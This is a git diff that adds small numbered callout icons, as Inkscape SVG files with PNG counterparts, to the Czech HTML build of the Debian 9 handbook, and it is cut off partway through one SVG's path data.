diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/38.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/38.svg
new file mode 100644
index 000000000..487e0ef30
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/38.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.48741,9.7149811 c 0.503575,1.23e-5 0.979486,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337557,0.243501 0.605949,0.547862 0.805176,0.913086 0.19921,0.365244 0.298819,0.794118 0.298828,1.286621 -9e-6,0.365243 -0.05535,0.697274 -0.166016,0.996094 -0.110685,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193692,0.237963 -0.423347,0.451017 -0.688965,0.639161 -0.265631,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.63362,0.362473 0.937988,0.572754 0.309889,0.210292 0.583814,0.448247 0.821778,0.713867 0.237947,0.260096 0.428865,0.55339 0.572754,0.879883 0.143871,0.326501 0.215811,0.691735 0.21582,1.095703 -9e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478687,0.758139 -0.838379,1.045898 -0.359708,0.287761 -0.791348,0.509115 -1.294922,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651855,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.937991,-0.362467 -1.286622,-0.639161 -0.348634,-0.276691 -0.614258,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265625,-0.857744 -0.265625,-1.361328 0,-0.415035 0.06087,-0.78857 0.182618,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498046,-0.896485 0.210285,-0.265619 0.456542,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271161,-0.171543 -0.525718,-0.356927 -0.763672,-0.556152 -0.237957,-0.204746 -0.445477,-0.428866 -0.622558,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -1e-6,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478676,-0.669585 0.821777,-0.913086 0.343097,-0.249012 0.738767,-0.434396 1.187012,-0.5561527 0.448238,-0.1217326 0.918615,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.10791,0.614258 0.07194,0.18262 0.17708,0.340334 0.31543,0.473145 0.143876,0.132814 0.32096,0.237957 0.53125,0.315429 0.210282,0.07194 0.453771,0.107912 0.730468,0.10791 0.58105,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.431641,-1.087402 -7e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218594,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.32097,-0.307125 -0.514649,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 20.3878,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664062,0.398438 -0.199223,0.138351 -0.370772,0.293299 -0.514649,0.464844 -0.138349,0.16602 -0.246259,0.348637 -0.32373,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.70166,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514648,0.08301 -0.154952,0.05535 -0.290532,0.13559 -0.406739,0.240723 -0.11068,0.105153 -0.199222,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282227,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160477,0.09962 0.32926,0.199226 0.506348,0.298828 0.171544,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154942,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.121739,-0.138338 0.218581,-0.293286 0.290527,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.15772,-0.284984 -0.273926,-0.390137 -0.116216,-0.105133 -0.254562,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/39.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/39.png
new file mode 100644
index 000000000..d6894500c
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/39.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/39.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/39.svg
new file mode 100644
index 000000000..cea69f715
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/39.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.554792,15.052383 c -8e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340332,1.651856 -0.16049,0.525719 -0.381844,1.018232 -0.664063,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426112,0.332032 -0.94076,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.300459,0.282227 -2.108398,0.282227 -0.116214,0 -0.243493,-0.0028 -0.381836,-0.0083 -0.138349,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273928,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237953,0.02767 0.478675,0.04151 0.722168,0.0415 0.747066,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.48144,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.28222,-0.337562 0.481439,-0.738766 0.597656,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.10791,0 c -0.110683,0.199225 -0.243496,0.384609 -0.398438,0.556153 -0.154953,0.171554 -0.33757,0.320968 -0.547851,0.448242 -0.210292,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.26563,0.07194 -0.561691,0.107914 -0.888184,0.10791 -0.525719,4e-6 -0.998863,-0.08577 -1.419433,-0.257324 -0.420575,-0.171545 -0.777509,-0.420568 -1.070801,-0.74707 -0.287762,-0.326492 -0.509116,-0.727696 -0.664063,-1.203614 -0.154948,-0.475904 -0.232422,-1.020988 -0.232422,-1.635253 0,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453775,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758136,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043128,-0.2905151 1.651856,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520175,0.210298 0.971184,0.534028 1.353027,0.971192 0.381828,0.437185 0.683423,0.990569 0.904785,1.660156 0.221346,0.669605 0.332023,1.458178 0.332031,2.365722 m -4.216796,-3.262207 c -0.226893,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188155,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132816,0.171559 -0.237959,0.392913 -0.31543,0.664062 -0.07194,0.265634 -0.107913,0.581063 -0.10791,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373535,1.394532 0.24902,0.343105 0.625322,0.514654 1.128906,0.514648 0.254553,6e-6 0.486975,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.539551,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124505,-0.401197 0.124512,-0.605958 -7e-6,-0.282218 -0.03598,-0.561677 -0.107911,-0.838378 -0.06641,-0.282218 -0.171555,-0.534008 -0.315429,-0.755372 -0.138352,-0.226878 -0.312669,-0.409495 -0.52295,-0.547851 -0.204757,-0.138336 -0.44548,-0.207509 -0.722167,-0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/4.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/4.png
new file mode 100644
index 000000000..f6c113563
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/4.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/4.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/4.svg
new file mode 100644
index 000000000..3b537d4a1
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/4.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 20.078077,19.493301 -1.460937,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460937,0 0,1.992187 m -3.959472,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09962,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.12175,0.2601 -0.262863,0.520191 -0.42334,0.780274 l -2.025391,3.071289 2.75586,0"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/40.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/40.png
new file mode 100644
index 000000000..0d3532e0f
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/40.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/40.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/40.svg
new file mode 100644
index 000000000..bb4e1d7b8
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/40.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.440535,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.0136719,0 0,-1.784668 5.1547849,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262863,0.520191 -0.42334,0.780274 l -2.0253904,3.071289 2.7558594,0"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/5.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/5.png
new file mode 100644
index 000000000..4ced5472d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/5.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/5.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/5.svg
new file mode 100644
index 000000000..ec2715dea
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/5.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 16.035597,14.255508 c 0.520177,8e-6 1.004388,0.08025 1.452637,0.240723 0.448235,0.160489 0.838371,0.395678 1.17041,0.705566 0.332023,0.309903 0.592114,0.697272 0.780273,1.16211 0.188143,0.459315 0.282218,0.987797 0.282227,1.585449 -9e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.204761,0.520184 -0.506356,0.962892 -0.904785,1.328125 -0.398445,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261724,0.290528 -2.025391,0.290528 -0.304365,0 -0.60596,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863281,-0.124512 -0.271161,-0.04981 -0.531252,-0.116211 -0.780274,-0.199219 -0.24349,-0.08301 -0.464844,-0.17985 -0.664062,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672363,0.31543 0.254556,0.09408 0.517414,0.177086 0.788574,0.249024 0.276691,0.06641 0.553383,0.121746 0.830078,0.166015 0.27669,0.03874 0.539548,0.05811 0.788575,0.05811 0.741532,2e-6 1.305984,-0.152179 1.693359,-0.456543 0.387364,-0.309893 0.581049,-0.799639 0.581055,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751465,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320966,0.03874 -0.481445,0.06641 -0.154951,0.02768 -0.304365,0.05811 -0.448242,0.09131 -0.143883,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456542,-6.1840821 6.408204,0 0,2.1748051 -4.183594,0 -0.199219,2.382324 c 0.17708,-0.03873 0.381832,-0.07747 0.614258,-0.116211 0.237951,-0.03873 0.542313,-0.0581 0.913086,-0.05811"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/6.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/6.png
new file mode 100644
index 000000000..22fc272c0
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/6.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/6.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/6.svg
new file mode 100644
index 000000000..b80629368
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/6.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 11.702589,16.853653 c -10e-7,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.0664,-0.575514 0.179849,-1.126132 0.340332,-1.651856 0.166014,-0.531241 0.387368,-1.023753 0.664062,-1.477539 0.282225,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431638,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603186,-0.1936727 1.305984,-0.2905151 2.108399,-0.2905274 0.116204,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.138339,0.00555 0.276685,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251782,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210295,-0.04979 -0.434416,-0.08853 -0.672364,-0.116211 -0.232429,-0.03319 -0.467617,-0.04979 -0.705566,-0.0498 -0.747076,1e-5 -1.361334,0.09408 -1.842774,0.282226 -0.481449,0.182627 -0.863285,0.439951 -1.145507,0.771973 -0.28223,0.33204 -0.484216,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.215821,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243486,-0.384596 0.398437,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556153,-0.448242 0.210282,-0.127271 0.44547,-0.22688 0.705566,-0.298828 0.26562,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419433,0.257324 0.420566,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.15494,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282226,1.768066 -0.182626,0.520184 -0.445484,0.962892 -0.788575,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643554,0.282227 -0.597661,0 -1.15658,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.973961,-0.542317 -1.361328,-0.979492 -0.381838,-0.437173 -0.683433,-0.987791 -0.904785,-1.651856 -0.215822,-0.669593 -0.323732,-1.460933 -0.323731,-2.374023 m 4.216797,3.270508 c 0.226883,2e-6 0.431635,-0.0415 0.614258,-0.124512 0.188145,-0.08854 0.348627,-0.218585 0.481445,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.31543,-0.664062 